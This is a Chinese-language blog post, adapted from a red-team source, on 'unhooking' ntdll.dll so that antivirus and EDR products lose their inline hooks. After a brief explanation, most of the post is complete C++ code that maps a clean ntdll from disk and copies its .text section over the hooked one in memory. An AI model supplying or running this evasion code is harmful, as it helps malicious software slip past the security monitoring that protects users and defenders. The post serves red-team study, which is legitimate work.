idiotc4t's blog
搜索文档…
GitBook 提供支持
重新加载.text节拖钩

简介

以前简单介绍过inline hook,杀软会对ntdll进入内核的函数进行挂钩,从而实现检测和阻止,mantvydasb师傅已经对这种技术有详尽的解释,并没有什么特别复杂的操作,只是把ntdll的.text(代码节)进行了读取覆盖。

流程

    1.
    读取ntdll进内存
    2.
    读取覆盖.text节

代码

代码是对mantvydasb师傅拙劣的模仿(直接抄233)。
ps:使用MapViewOfFile读取文件会直接在内存里展开。
1
#include <Windows.h>
2
#include <psapi.h>
3
4
int main()
5
{
6
MODULEINFO mInfo = { 0 };
7
HANDLE hProcess = GetCurrentProcess();
8
9
//get address of ntdll in virtual memory
10
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
11
GetModuleInformation(hProcess, hNtdll, &mInfo, sizeof(mInfo));
12
LPVOID lpNtdllbase = (LPVOID)mInfo.lpBaseOfDll;
13
14
HANDLE hNtdllfile = CreateFileA("c:\\windows\\system32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
15
HANDLE hNtdllMapping = CreateFileMapping(hNtdllfile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
16
LPVOID lpNtdllmaping = MapViewOfFile(hNtdllMapping, FILE_MAP_READ, 0, 0, 0);
17
18
PIMAGE_DOS_HEADER pDosheader = (PIMAGE_DOS_HEADER)lpNtdllbase;
19
PIMAGE_NT_HEADERS pNtheader = (PIMAGE_NT_HEADERS)((DWORD_PTR)lpNtdllbase + pDosheader->e_lfanew);
20
21
for (WORD i = 0; i < pNtheader->FileHeader.NumberOfSections; i++) {
22
PIMAGE_SECTION_HEADER pSectionheader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(pNtheader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));
23
24
if (!strcmp((char*)pSectionheader->Name, (char*)".text")) {
25
DWORD oldProtection = 0;
26
bool isProtected = VirtualProtect((LPVOID)((DWORD_PTR)lpNtdllbase + (DWORD_PTR)pSectionheader->VirtualAddress), pSectionheader->Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &oldProtection);
27
memcpy((LPVOID)((DWORD_PTR)lpNtdllbase + (DWORD_PTR)pSectionheader->VirtualAddress), (LPVOID)((DWORD_PTR)lpNtdllmaping + (DWORD_PTR)pSectionheader->VirtualAddress), pSectionheader->Misc.VirtualSize);
28
isProtected = VirtualProtect((LPVOID)((DWORD_PTR)lpNtdllbase + (DWORD_PTR)pSectionheader->VirtualAddress), pSectionheader->Misc.VirtualSize, oldProtection, NULL);
29
}
30
}
31
32
CloseHandle(hProcess);
33
CloseHandle(hNtdllfile);
34
CloseHandle(lpNtdllmaping);
35
FreeLibrary(hNtdll);
36
37
return 0;
38
}
Copied!

LINKS

Full DLL Unhooking with C++
Red Teaming Techniques & Experiments
最近更新 1yr ago
复制链接